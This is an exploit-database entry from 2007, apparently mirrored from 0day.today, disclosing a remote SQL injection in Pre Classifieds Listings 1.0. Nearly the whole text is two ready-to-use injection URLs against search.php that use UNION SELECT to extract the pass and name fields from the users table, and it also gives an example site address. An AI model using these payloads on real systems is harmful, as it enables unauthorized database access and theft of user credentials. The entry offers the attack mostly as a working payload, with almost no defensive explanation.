id: 1821
date: 05/02/2007
title: Pre Classifieds Listings 1.0 Remote SQL Injection Vulnerability
author: xoron
cves: 

===============================================================
Pre Classifieds Listings 1.0 Remote SQL Injection Vulnerability
===============================================================


==============================================

Pre Classifieds Listings v1.0 Remote SQL Injection

==============================================

Exploit:
search.php?category=-1/**/union/**/select/**/pass/**/from/**/users/*
search.php?category=-1/**/union/**/select/**/name/**/from/**/users/*

==============================================

Example: http://preproject.com/phppcl/

==============================================



#  0day.today [2023-03-24]  #